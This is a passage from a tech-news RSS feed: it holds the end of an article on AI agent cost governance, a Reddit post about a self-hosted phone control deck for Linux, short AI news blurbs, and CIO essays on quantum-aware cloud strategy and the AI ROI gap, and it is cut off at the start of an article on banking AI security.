<h2 class="wp-block-heading">Layer 3: Cost optimization</h2>



<p>Cost is where the architecture pays back. Gartner’s March 2026 analysis put <a href="https://www.gartner.com/en/newsroom/press-releases/2026-03-25-gartner-predicts-that-by-2030-performing-inference-on-an-llm-with-1-trillion-parameters-will-cost-genai-providers-over-90-percent-less-than-in-2025">agentic workloads at five to 30 times the token cost per task</a> of a standard chatbot. The FinOps Foundation’s 2026 State of FinOps report found that <a href="https://data.finops.org/">73% of organizations exceeded their original AI budget projections</a>. Three failure modes drive that overrun.</p>



<p>First, using the wrong model. Agents default to the most capable one available. They call a frontier model for tasks a smaller one could handle with identical quality: summarizing a transcript, formatting JSON, classifying a ticket. The <a href="https://proceedings.iclr.cc/paper_files/paper/2025/hash/5503a7c69d48a2f86fc00b3dc09de686-Abstract-Conference.html">RouteLLM paper at ICLR 2025</a> demonstrated that intelligent routing cuts total LLM inference cost 40% to 80% with no measurable quality loss on routine work. Move model selection from a per-developer choice to a per-policy layer.</p>



<p>Second, running in loops. Agents can spend without limit if no one is watching. A widely-cited 2026 incident saw a <a href="https://dev.to/dingdawg/how-an-ai-agent-ran-up-a-47000-bill-in-11-days-and-how-to-stop-it-1fk">LangChain multi-agent system run an infinite loop for 11 days and burn $47,000 in API charges</a>. Per-session token ceilings, <a href="https://fountaincity.tech/resources/blog/ai-agent-cost-circuit-breaker/">loop-detection circuit breakers</a> that flag tool calls highly similar to prior calls, and hard daily caps stop this before it generates the bill. In our deployments, a <a href="https://www.supra-wall.com/en/learn/ai-agent-runaway-costs">three-tier cost structure</a> catches the bulk of runaway patterns: a $50 daily soft alert, a $100 daily hard cutoff forcing routing to cheaper models, and a $1,000 monthly ceiling requiring manager approval.</p>



<p>Third, re-paying for the same context on every step. Every step re-sends the accumulated system prompt and conversation history. By step 20 the agent has paid for that context 20 times. <a href="https://www.vantage.sh/blog/agentic-coding-costs">Vantage’s 2026 analysis of agentic coding sessions</a> found re-sent context accounts for roughly 62% of the average agent’s bill, the biggest single optimization target in agentic workloads. Three patterns help: anchored summarization at phase boundaries, sliding context windows, and provider-native prompt caching at the gateway. Most agents skip caching entirely, though <a href="https://platform.claude.com/docs/en/build-with-claude/prompt-caching">Anthropic</a> prices cached input at roughly 10% of base, <a href="https://developers.googleblog.com/en/gemini-2-5-models-now-support-implicit-caching/">Gemini</a> at 10% to 25%, and <a href="https://openai.com/index/api-prompt-caching/">OpenAI</a> at 50%.</p>



<p>Governing agent cost means seeing every call, every model, every token attributed to the agent and the business purpose. Then act on it. Token counts without business attribution tell you how many gallons of gas you burned, not where you drove.</p>



<h2 class="wp-block-heading">The deployment velocity payoff</h2>



<p>The three layers serve the three executive questions. Identity gates what the agent can do. Observability shows what it is doing. Cost optimization controls what it spends.</p>



<p>The honest counterargument is that governance always slows deployment. That is true when governance is bolted on as approval gates layered over an agent that wasn’t built with observability or per-task identity. It is false when governance is built into the architecture from day one. Teams that experience governance as a brake installed the brake without the steering wheel.</p>



<p>Governance built right still costs something. Per-task credentials add work on every tool call. Observability infrastructure adds compute. The question is whether that cost beats the alternative.</p>



<p>The layers compound. Identity without observability is theoretical. Observability without cost control is descriptive. Without identity at the bottom, cost control becomes caps without context, forever reactive. All three together produce a governance review that runs in weeks, not quarters, because the data each executive needs already exists. In our experience, organizations with that infrastructure can deploy six workflows to production in the time competitors complete one governance review. The real ROI of agentic AI is not how much faster a single workflow runs. In practice, it’s how many workflows your team can defensibly put into production in a year.</p>



<h2 class="wp-block-heading">Before the next pilot</h2>



<p>Here are four questions to run against any agent your team is about to push to production:</p>



<ol class="wp-block-list">
<li>Identity. For each agent in production, can you point to the per-task credentials it uses today, and the maximum scope of any single token?</li>



<li>Observability. For any agent session, can you produce three views from the same instrumentation: the audit object per step, the on-task ratio versus tangents, and the per-step cost broken down by model and context size?</li>



<li>Cost optimization. Does your platform automatically route by model, cap runaway loops, and avoid re-sending the same context every step?</li>



<li>Velocity. How long does it take a new agent workflow to move from approved pilot to production in your environment today?</li>
</ol>



<p>If the answer is months, the architecture above is the gap. Gartner’s 40% stat is about your next pilot.</p>



<p><em>—</em></p>



<p><a href="https://www.infoworld.com/blogs/new-tech-forum"><strong><em>New Tech Forum</em></strong></a><em><strong> provides a venue for technology leaders—including vendors and other outside contributors—to explore and discuss emerging enterprise technology in unprecedented depth and breadth. The selection is subjective, based on our pick of the technologies we believe to be important and of greatest interest to InfoWorld readers. InfoWorld does not accept marketing collateral for publication and reserves the right to edit all contributed content. Send all </strong></em><em><strong>inquiries to </strong></em><a href="mailto:doug_dineley@foundryco.com"><strong><em>doug_dineley@foundryco.com</em></strong></a><em><strong>.</strong></em></p>
</div></div></div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[I built a control deck + remote desktop for my Linux workstation, served to a spare phone over Tailscale (self-hosted, MIT license)]]></title>
<description><![CDATA[A spare Android + a Linux box I kept wanting to nudge without reaching for the keyboard = phone-deck: a self-hosted web deck (FastAPI + WebSockets) that installs on the phone as a fullscreen PWA and drives my Linux/Hyprland desktop over Tailscale. Started as "switch workspaces from the couch," tu...]]></description>
<link>https://tsecurity.de/de/3655739/linux-tipps/i-built-a-control-deck-remote-desktop-for-my-linux-workstation-served-to-a-spare-phone-over-tailscale-self-hosted-mit-license/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3655739/linux-tipps/i-built-a-control-deck-remote-desktop-for-my-linux-workstation-served-to-a-spare-phone-over-tailscale-self-hosted-mit-license/</guid>
<pubDate>Thu, 09 Jul 2026 03:54:26 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>A spare Android + a Linux box I kept wanting to nudge without reaching for the keyboard = phone-deck: a self-hosted web deck (FastAPI + WebSockets) that installs on the phone as a fullscreen PWA and drives my Linux/Hyprland desktop over Tailscale. Started as "switch workspaces from the couch," turned into a whole cockpit.</p> <p>What it does:</p> <p>- Remote desktop — streams a monitor to the phone (wf-recorder → PyAV → WebRTC/VP8, so it's Wayland-native, no x11grab); touch the video to drive the cursor, long-press = right-click. "Lock input" turns the phone into a wireless keyboard + mouse + screen.</p> <p>- Remote input — trackpad + soft keyboard + key-chords via python-evdev → /dev/uinput, which works fine under Wayland (no X, and no root once you're in the input group).</p> <p>- Bidirectional audio — listen to the PC on the phone, or use the phone as a mic, via WebRTC + PipeWire null sinks.</p> <p>- The rest — live workspaces/windows off the compositor's IPC, scene layouts, per-monitor screenshots, Android share-sheet → desktop, push-to-talk voice with local whisper + a read-only local-LLM answerer, and a fleet host-switcher (runs on my laptop too).</p> <p>- Idle for a few minutes → an ambient instrument panel (telemetry, clock, now-playing) in a phosphor-CRT skin.</p> <p>Design bit I'm happy with: it pokes a root-ish surface, so the web app runs unprivileged and never executes shell strings — it sends enum action names to a tiny root helper over a unix socket (no argument-injection surface), with auth bound to the tailnet and tailscale serve for HTTPS. Nothing's exposed to the public internet.</p> <p>Honest caveat: it's welded to my setup (Hyprland, my monitor/workspace layout, Tailscale), so it's "here's how I did it, take the code," not a turnkey app — but the input/capture/audio pieces are fairly general Linux and might be useful to lift.</p> <p>Repo (MIT): <a href="http://github.com/smit-shah-GG/phone-deck">github.com/smit-shah-GG/phone-deck</a></p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/GenocideMan99"> /u/GenocideMan99 </a> <br> <span><a href="https://i.redd.it/z2pbb9da14ch1.jpeg">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1urclxg/i_built_a_control_deck_remote_desktop_for_my/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[v2026.7.1-beta.3]]></title>
<description><![CDATA[OpenClaw 2026.7.1-beta.3]]></description>
<link>https://tsecurity.de/de/3655726/downloads/v202671-beta3/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3655726/downloads/v202671-beta3/</guid>
<pubDate>Thu, 09 Jul 2026 03:46:52 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>OpenClaw 2026.7.1-beta.3</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Tool promises to make lazy academics' AI-written papers sound more human]]></title>
<description><![CDATA[Startup insists it's not trying to help anyone cheat the system - honest!]]></description>
<link>https://tsecurity.de/de/3654858/it-nachrichten/tool-promises-to-make-lazy-academics-ai-written-papers-sound-more-human/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3654858/it-nachrichten/tool-promises-to-make-lazy-academics-ai-written-papers-sound-more-human/</guid>
<pubDate>Wed, 08 Jul 2026 18:19:32 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Startup insists it's not trying to help anyone cheat the system - honest!]]></content:encoded>
</item>
<item>
<title><![CDATA[AI changed our cloud strategy. Quantum changes the questions behind it]]></title>
<description><![CDATA[The strangest thing about cloud strategy is how confident it looks in PowerPoint and how nervous it feels in real life.



I’ve sat in rooms where the cloud slide looked clean enough to frame. Public cloud here. Private cloud there. Hybrid for the awkward middle child. Multi-cloud for resilience,...]]></description>
<link>https://tsecurity.de/de/3654083/it-security-nachrichten/ai-changed-our-cloud-strategy-quantum-changes-the-questions-behind-it/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3654083/it-security-nachrichten/ai-changed-our-cloud-strategy-quantum-changes-the-questions-behind-it/</guid>
<pubDate>Wed, 08 Jul 2026 13:08:36 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>The strangest thing about cloud strategy is how confident it looks in PowerPoint and how nervous it feels in real life.</p>



<p>I’ve sat in rooms where the cloud slide looked clean enough to frame. Public cloud here. Private cloud there. Hybrid for the awkward middle child. Multi-cloud for resilience, bargaining power and the faint hope that no single vendor would ever own our sleep.</p>



<p>Then AI arrived.</p>



<p>At first, it looked like another conversation about workload. Bigger compute. More storage. Faster experiments. Some awkward cost questions. Nothing we couldn’t absorb with a thicker roadmap.</p>



<p>Then the bills landed. The data moved in odd ways. Teams built things before governance could find its shoes. Vendors became more central than anyone had admitted.</p>



<p>The old cloud strategy didn’t collapse. It blushed. AI exposed the assumptions beneath it.</p>



<p>Now, quantum changes something deeper. It asks whether the decisions behind the workload can survive time, secrecy, suppliers, weak evidence and uncertainty.</p>



<p>That’s a much less comfortable meeting.</p>



<h2 class="wp-block-heading">Cloud strategy was built for workloads we thought we understood</h2>



<p>For years, cloud strategy was a sensible debate about location, cost, control and speed. Public cloud for scale. Private cloud for sensitive workloads. Hybrid cloud for compromise. Multi-cloud for resilience, negotiation or, if we’re being honest, organizational politics with a nice diagram.</p>



<p>The logic was sound. Move faster. Cut heavy infrastructure spend. Improve recovery. Give developers what they need before they grow old waiting for a server. It worked because the work behaved in familiar ways. Systems had owners. Costs had patterns. Data had borders, or at least we pretended it did.</p>



<p>The question was simple: Where should this workload live? That question still matters. But it no longer carries enough weight.</p>



<p>AI changed that. AI changed the pattern, not just the platform AI didn’t politely join the cloud strategy. It wandered through the house, opened every cupboard and asked why the plumbing sounded tired.</p>



<p>The first shock was demand.</p>



<p>Traditional systems consume resources in ways you can usually model. AI workloads behave differently. Training, testing, inference and data processing can spike, pause, restart and spread before anyone has agreed on who owns the meter.</p>



<p>Cloud cost control used to ask a billing question, “How much will we use?” AI asks an operating question: “Who is allowed to create demand, at what scale, for what purpose and with whose approval?”</p>



<p>The second shock was data.</p>



<p>AI does more than store data. It chews it, reshapes it, remembers parts of it, produces new versions of it and leaves traces in places people forget to check. Prompts, logs, embeddings, model outputs, copied files and forgotten notebooks can become quiet risk pockets.</p>



<p>A cloud strategy that only asks where data sits misses how data behaves.</p>



<p>The third shock was supplier dependency.</p>



<p>Many firms thought they had a cloud strategy. AI revealed they had a supplier dependency strategy wearing a cloud badge. GPUs, model platforms, managed services, specialist APIs and third-party tools became central to delivery.</p>



<p>AI compressed the distance between idea and exposure. A team could test, connect and release faster than governance could form a working group. I say that with affection. I’ve seen working groups age in dog years.</p>



<p>Cloud strategy had become a test of decision speed, risk appetite, financial discipline and data control. It now goes beyond architecture.</p>



<p>Then quantum changed the clock.</p>



<h2 class="wp-block-heading">Quantum changes the time horizon</h2>



<p>Quantum risk often gets dumped into the cryptography drawer. That is understandable. It is also dangerous.</p>



<p>The leadership issue adds time to the future of quantum computers.</p>



<p>Some data stolen today may still matter years from now. Some secrets age badly. Trade secrets, legal records, health data, source code, identity data and sensitive contracts don’t all expire at the same speed. Some decay like fruit. Some sit like plutonium.</p>



<p>That is why “harvest now, decrypt later” matters. An attacker may collect encrypted data today and wait for better tools tomorrow. You don’t need to panic. You do need to ask which data has a long secrecy life.</p>



<p>If your most sensitive long-lived data spans cloud platforms, SaaS services, backups, archives, collaboration tools and supplier systems, where exactly is your quantum exposure? Which encryption protects it? Who manages the keys? Which supplier has a plan? Which one has a brochure?</p>



<p>A brochure is a scented candle for anxious executives.</p>



<p>Migration also takes time. Cryptography hides everywhere. In applications. In identity systems. In network devices. In APIs. In firmware. In backup tools. In old systems, nobody wants to touch.</p>



<p>Quantum readiness goes beyond a weekend patch. It is discovery, classification, design, testing, contracts, funding, sequencing and proof.</p>



<p>The risky sentence is, “We’ll revisit this when things become clearer.”</p>



<p>By then, the cheap decisions may have left the building.</p>



<h2 class="wp-block-heading">The real issue is decision infrastructure</h2>



<p>AI exposed assumptions about speed, cost, data and suppliers. Quantum exposes timing, ownership, evidence and memory. Together, they point to a quieter weakness: decision infrastructure.</p>



<p>By decision infrastructure, I mean the system by which leaders frame risk, assign ownership, make trade-offs, record choices, track evidence and revisit assumptions when facts change. That sounds dull. Good. Dull is where serious governance lives. The glamorous stuff gets applause. The dull stuff prevents regret.</p>



<p>Many organizations saw the risk and still failed because too many people saw different pieces of it, and nobody owned the decision. The cloud team sees architecture. Security sees exposure. Legal sees liability. Procurement sees contract gaps. Finance sees cost drift.</p>



<p>The board sees amber. Amber is often where hard decisions go to nap.</p>



<p>This is why AI and quantum belong in the same leadership conversation. AI asks whether your cloud strategy can keep pace. Quantum asks whether it can cope with time. Both punish vague ownership.</p>



<p>Who owns long-term cryptographic exposure? Who can force a supplier conversation? Who accepts residual risk if migration cannot happen fast enough? Who records why a decision was made and when it must be reviewed?</p>



<p>Suppose those questions feel awkward, good. Awkward questions earn their rent.</p>



<h2 class="wp-block-heading">The questions leaders should ask now</h2>



<p>The board needs better questions.</p>



<p>Start with exposure. What protects your most sensitive systems and data? Where do you rely on supplier-managed encryption? Which systems are old, critical, poorly documented and painful to change?</p>



<p>Exposure is a map of assets, data, dependencies and time.</p>



<p>Then ask about ownership. Who owns quantum readiness across cloud, cyber, legal, procurement, privacy, resilience and the business? Who can make trade-off decisions when risk reduction competes with cost and delivery? Which risks are stuck because everyone is involved and nobody is accountable?</p>



<p>Awareness without ownership is just anxiety with better stationery.</p>



<p>Then ask about evidence. Can you show progress by system, supplier, business service and data class? Would your evidence survive a board review, a regulator’s questioning or a post-incident investigation?</p>



<p>Evidence built under pressure is expensive. It is also sweaty. Build the proof trail before the room gets hot.</p>



<p>Finally, ask about timing. Which choices must be made now because migration will take years? What event would trigger faster action? When will the board revisit the risk?</p>



<p>Which delay would you regret if the timeline moves faster than expected?</p>



<p>That last question matters. Regret is often the most honest risk metric in the room.</p>



<h2 class="wp-block-heading">What a quantum-aware cloud strategy looks like</h2>



<p>A quantum-aware cloud strategy is not a glossy side document owned by three cryptographers and a nervous intern.</p>



<p>It is a cloud strategy with better questions built into it:</p>



<ol class="wp-block-list">
<li><strong>Build cryptographic visibility.</strong> Start with the services that matter most. Find the encryption, certificates, protocols, keys, libraries and suppliers that protect them. Perfection can wait. Blindness cannot.</li>



<li><strong>Classify data by secrecy life.</strong> Not just sensitivity. Time. How long must this information stay protected? A short-lived report and a long-life trade secret do not belong in the same queue.</li>



<li><strong>Press suppliers for evidence.</strong> Ask what they are doing, what you must do and how they will prove progress. Confidence is lovely. Evidence pays the rent.</li>



<li><strong>Rank migration by risk.</strong> Start where business value, long-life data, weak visibility and migration pain meet. Treating everything as equal is how serious work becomes theatre.</li>



<li><strong>Change board reporting.</strong> Don’t report quantum as a foggy science project. Report decisions required, risks accepted, blockers, supplier gaps and review dates. Boards govern choices. Give them choices.</li>



<li><strong>Build a review rhythm.</strong> Standards, tools, suppliers, threats and regulations will continue to evolve. A stale roadmap is just a risk register wearing a lab coat.</li>
</ol>



<p>No panic. Panic burns energy and produces bad slides. The aim is readiness with owners, evidence and judgment.</p>



<h2 class="wp-block-heading">The cloud question grew up</h2>



<p>Cloud strategy began as an architecture question.</p>



<p>AI turned it into an operating question. Quantum turns it into a leadership question.</p>



<p>That is the shift.</p>



<p>To handle this well, organizations will need to build decision muscle early. They will know what matters, who owns it, what evidence exists, which suppliers are ready and when the next decision must be made.</p>



<p>But beneath cloud, AI and quantum sits the discipline leaders often avoid until pressure arrives, wearing a suit: decision quality.</p>



<p>AI changed the cloud bill. Quantum changes the clock.</p>



<p>And the clock is where risk hides.</p>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>



<p></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[The AI ROI gap isn’t a model problem. It’s a workflow problem]]></title>
<description><![CDATA[Anthropic says Claude now writes more than 80% of the code merged at one of the most sophisticated AI companies on the planet. Foundry’s 2026 State of the CIO study says fewer than one in five enterprises can show that their AI initiatives have met or exceeded their ROI goals. Both numbers came o...]]></description>
<link>https://tsecurity.de/de/3653733/it-nachrichten/the-ai-roi-gap-isnt-a-model-problem-its-a-workflow-problem/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3653733/it-nachrichten/the-ai-roi-gap-isnt-a-model-problem-its-a-workflow-problem/</guid>
<pubDate>Wed, 08 Jul 2026 11:02:59 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p><a href="https://www.anthropic.com/institute/recursive-self-improvement" rel="nofollow">Anthropic says</a> Claude now writes more than 80% of the code merged at one of the most sophisticated AI companies on the planet. Foundry’s <a href="https://www.cio.com/article/4178006/state-of-the-cio-2026-cios-set-the-course-for-ai-roi.html">2026 State of the CIO study</a> says fewer than one in five enterprises can show that their AI initiatives have met or exceeded their ROI goals. Both numbers came out this spring. Both are true. And the distance between them is the most important thing an IT leader can understand about AI right now.</p>



<p>Because that distance isn’t a contradiction, it’s a lesson. And the profession sitting in the middle of it, software engineering, is the canary that explains why so much enterprise AI spend has produced so little measurable return.</p>



<h2 class="wp-block-heading">The report everyone misread</h2>



<p>When Anthropic published its recursive self-improvement piece, plenty of people read it as the starting gun for the job apocalypse. Claude writing its own code, models getting better at building models, humans narrowing toward oversight. If you wanted a headline about the end of the software profession, it was right there.</p>



<p>I read it almost the opposite way. What struck me wasn’t how far AI had come. It was how much had to be true first, even in the one profession built from the ground up to let it succeed.</p>



<p>I made this argument back in my <a href="https://www.cio.com/article/4166029/the-570k-canary-what-ai-coding-agents-reveal-about-enterprise-ais-real-gaps.html">“$570K canary” piece</a>, and the Anthropic data only sharpens it. AI coding agents don’t work because coding models are special. The underlying large language models (LLMs) are the same ones answering support tickets and reviewing contracts. They work because software development already had the infrastructure that makes an agent’s output trustworthy: governance baked into branch protection and code review, observability through version control and CI/CD pipelines, evaluation through automated tests, persistent context through commit history. Developers built all of that for themselves over decades. They didn’t build it for AI. But it turned out to be exactly the scaffolding AI needed.</p>



<p>That’s the part the apocalypse reading skips. Claude’s coding gains are real. They also rode on decades of pre-built substrate. Both things are true at once, and the second one is the one CIOs should be paying attention to when it comes to gains from things like recursive self-improvement.</p>



<h2 class="wp-block-heading">What the CIO data actually shows</h2>



<p>Now hold that next to the State of the CIO numbers. Only 19% of the 662 IT leaders surveyed say their AI initiatives have met or exceeded business goals. Another 18% admit fewer than a third of their use cases are hitting defined expectations.</p>



<p>The easy explanation is that the technology isn’t ready. The data says otherwise. This isn’t for lack of trying, and it isn’t for lack of organizing. Eighty-three percent of respondents have stood up cross-functional steering committees or are about to. Just over half have some form of AI approval process in place, with another quarter building one. Forty-seven percent have formal success metrics, with a third more on the way. The field is pouring effort into the organizational machinery of AI. The ROI still isn’t showing up.</p>



<p>Here’s why I think that is. All of that machinery sits above the work. Steering committees, approval gates and KPI dashboards govern the org chart. But the value, or the leak, happens inside the workflow, at the level of the actual task the AI is doing. You can instrument your governance structure perfectly and still have nothing measuring whether the agent’s output was right at the point where it mattered.</p>



<p>TIAA shows how little the org chart settles. The firm is three years in, runs generative and agentic use cases across fraud detection and call centers, and has 85% of its people on TIAA Gate, its internal platform. It also has the full governance stack most CIOs are still assembling. None of it closed the gap. “You need to understand the full cost of operations,” its chief operating, information and digital officer, Sastry Durvasula told CIO.com, “the efficiencies of running tokens or how you’re handling traffic or RAG.” The structures were never the thing leaking value. The workflow underneath them was.</p>



<p>The barriers respondents named back this up. The top three are lack of in-house expertise (40%), ill-defined ROI metrics (32%) and murky corporate AI strategy (31%). Not one of them is “the model isn’t good enough.” And according to the full Foundry report, the expertise gap is deepest in healthcare (52%), retail (51%) and manufacturing (49%), the sectors whose core work looks least like a software development lifecycle. That’s consistent with substrate being the real variable, though a tighter market for AI talent in those industries is surely part of the story too.</p>



<h2 class="wp-block-heading">The market is already voting</h2>



<p>Look at where the AI is actually being pointed, and you’ll see enterprises sequencing by substrate even though nobody’s calling it that. Three-quarters of both IT leaders and line-of-business respondents say AI is primarily being used to automate internal processes rather than customer-facing applications.</p>



<p>That’s not timidity. It’s instinct pointing at the right thing. Internal processes are the ones with structured, observable workflows and users who tolerate a little friction. Customer-facing work is where the trust gaps are still wide open and the cost of a wrong answer is asymmetric. A bad internal draft gets fixed before anyone sees it. A bad customer answer is the whole ballgame.</p>



<p>I’ll be honest about a wrinkle in the data here, because a careful reader will catch it. The same study reports a near-mirror finding, that 66% to 69% of respondents say the bulk of their current AI work is customer-facing. The two stats sit a paragraph apart in the CIO study and almost certainly reflect how the question was framed rather than a real reversal. But the synthesis holds either way: even where customer-facing work is being attempted, it’s where ROI is least realized. The work that lands is the work with the substrate underneath it. The split only reinforces the point.</p>



<h2 class="wp-block-heading">Sequence by readiness, not by ambition</h2>



<p>So, here’s the prescription, and it cuts against the instinct most AI strategies are built on. Stop sequencing your AI portfolio by where the value looks biggest. Start sequencing it by where the work already has, or can be given, a structured workflow with a usable signal for whether the output was right.</p>



<p>The study itself shows what the alternative looks like. Andrea Ballinger, CIO at Rensselaer Polytechnic Institute, described the trap precisely. No one measures ROI on an ongoing basis, she said, “because we are facing counterpressures from every vice president and line-of-business domain looking to implement AI for their own optimization.” The result: “We are saying yes to everyone without stepping back and focusing on the business cases that show real value.” That’s value-led sequencing under pressure from every budget-holder in the building, and it’s exactly how you end up with a sprawling pipeline of pilots and a 19% success rate.</p>



<p>The counterexample comes from the same study. Thomas Prommer, a longtime CTO, CIO and CAIO, funds outcomes instead of deliverables. “We don’t fund ‘build a model,’ we fund ‘reduce returns by 8% on this category’ with checkpoints at 90, 180 and 270 days,” he explained. He kills any project that misses two checkpoints, “roughly a third of what we start, and that’s healthy.” Read that through the substrate lens and you see what he’s really doing. He’s manufacturing a correctness signal where the work didn’t come with one. He’s building the missing piece of scaffolding by hand.</p>



<p>That gives you a simple lens to run any candidate use case through. Does the work break into discernible stages? Can you observe what happens at each one? Is there a usable signal for whether the result was right? Score high on all three and you have a software-engineering-shaped problem, so go now. Score low and you have a choice: build the substrate first or wait. What you shouldn’t do is fund it at scale and hope the ROI materializes, because that’s the pile the 19% number is built on.</p>



<h2 class="wp-block-heading">The hard part, and the honest caveat</h2>



<p>Run the professions through that lens and they sort themselves. Finance is the closest cousin to software. Reconciliation, close processes, approval chains and audit trails already give you staged work with a clear “it reconciles or it doesn’t” signal, which is part of why financial services sits among the sectors furthest along with AI. Legal and medicine are harder. The workflow shell exists, intake to redline to filing, diagnosis to treatment to follow-up, but the correctness signal at the core is weak, delayed or confounded. You can automate the routine staged parts and you hit a wall at the judgment that defines the profession.</p>



<p>And that’s the caveat that keeps this honest. A structured workflow isn’t always buildable in software’s image. For the judgment core of some professions, the substrate is years out no matter how good the model gets or how mature your governance becomes. Anyone selling you a tighter timeline than that is selling.</p>



<p>But notice what this reframe does. It turns “our AI ROI is elusive” from a mystery you wait out into a sequencing-and-instrumentation problem you can actually test. Your timeline isn’t set by how smart the next model is. It’s set by how fast you build the substrate for your own domain, and that’s within your control.</p>



<h2 class="wp-block-heading">The two numbers, reconciled</h2>



<p>Put the 80% and the 19% back next to each other and they stop looking like a paradox. Software engineering didn’t win because its models were better than everyone else’s. It won because the work was already shaped to let an agent succeed, and the scaffolding that makes agent output trustworthy had been in place for decades before the agent showed up.</p>



<p>The question for the rest of the enterprise was never really whether AI can do the work. It’s whether your work is shaped so AI’s output can be trusted. That’s not something you wait for. It’s something you build.</p>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[NVIDIA’s Cosmos-Framework Tutorial: Designing a Colab-Friendly Miniature of Cosmos 3 World Models with Omnimodal Mixture-of-Transformers]]></title>
<description><![CDATA[In this tutorial, we explore NVIDIA's cosmos-framework from a practical Colab angle while staying honest about the hardware needed for real Cosmos 3 checkpoints. We probe the runtime, then use the framework's real structure, CLI surface, and input schema as a foundation. We build and train a comp...]]></description>
<link>https://tsecurity.de/de/3653519/ai-nachrichten/nvidias-cosmos-framework-tutorial-designing-a-colab-friendly-miniature-of-cosmos-3-world-models-with-omnimodal-mixture-of-transformers/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3653519/ai-nachrichten/nvidias-cosmos-framework-tutorial-designing-a-colab-friendly-miniature-of-cosmos-3-world-models-with-omnimodal-mixture-of-transformers/</guid>
<pubDate>Wed, 08 Jul 2026 09:18:52 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>In this tutorial, we explore NVIDIA's cosmos-framework from a practical Colab angle while staying honest about the hardware needed for real Cosmos 3 checkpoints. We probe the runtime, then use the framework's real structure, CLI surface, and input schema as a foundation. We build and train a compact omnimodal Mixture-of-Transformers that shares cross-modal attention while routing each modality to its own expert. Using synthetic physical-world data and an autoregressive rollout, we show how the model predicts future latent states across text, vision, and action.</p>
<p>The post <a href="https://www.marktechpost.com/2026/07/08/nvidias-cosmos-framework-tutorial-designing-a-colab-friendly-miniature-of-cosmos-3-world-models-with-omnimodal-mixture-of-transformers/">NVIDIA’s Cosmos-Framework Tutorial: Designing a Colab-Friendly Miniature of Cosmos 3 World Models with Omnimodal Mixture-of-Transformers</a> appeared first on <a href="https://www.marktechpost.com/">MarkTechPost</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Anthropic's Claude Cowork heads to the cloud as data shows 90% of sessions aren't for coding]]></title>
<description><![CDATA[Claude Cowork is moving to web and mobile, and new data shows it's being used far beyond coding and software development. Can it safely replace OpenClaw for me? Stay tuned.]]></description>
<link>https://tsecurity.de/de/3652071/it-nachrichten/anthropics-claude-cowork-heads-to-the-cloud-as-data-shows-90-of-sessions-arent-for-coding/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3652071/it-nachrichten/anthropics-claude-cowork-heads-to-the-cloud-as-data-shows-90-of-sessions-arent-for-coding/</guid>
<pubDate>Tue, 07 Jul 2026 18:05:05 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Claude Cowork is moving to web and mobile, and new data shows it's being used far beyond coding and software development. Can it safely replace OpenClaw for me? Stay tuned.]]></content:encoded>
</item>
<item>
<title><![CDATA[With AI, a wrong answer is a bug. A wrong action is an incident]]></title>
<description><![CDATA[A copilot that gives a wrong answer is a quality problem. An AI agent that takes a wrong action is an incident, sometimes a reportable one. That single difference is most of the story of where banking AI security is heading, and most banks’ current controls were built for the first kind of proble...]]></description>
<link>https://tsecurity.de/de/3650949/it-nachrichten/with-ai-a-wrong-answer-is-a-bug-a-wrong-action-is-an-incident/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3650949/it-nachrichten/with-ai-a-wrong-answer-is-a-bug-a-wrong-action-is-an-incident/</guid>
<pubDate>Tue, 07 Jul 2026 11:03:09 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>A copilot that gives a wrong answer is a quality problem. An AI agent that takes a wrong action is an incident, sometimes a reportable one. That single difference is most of the story of where banking AI security is heading, and most banks’ current controls were built for the first kind of problem, not the second.</p>



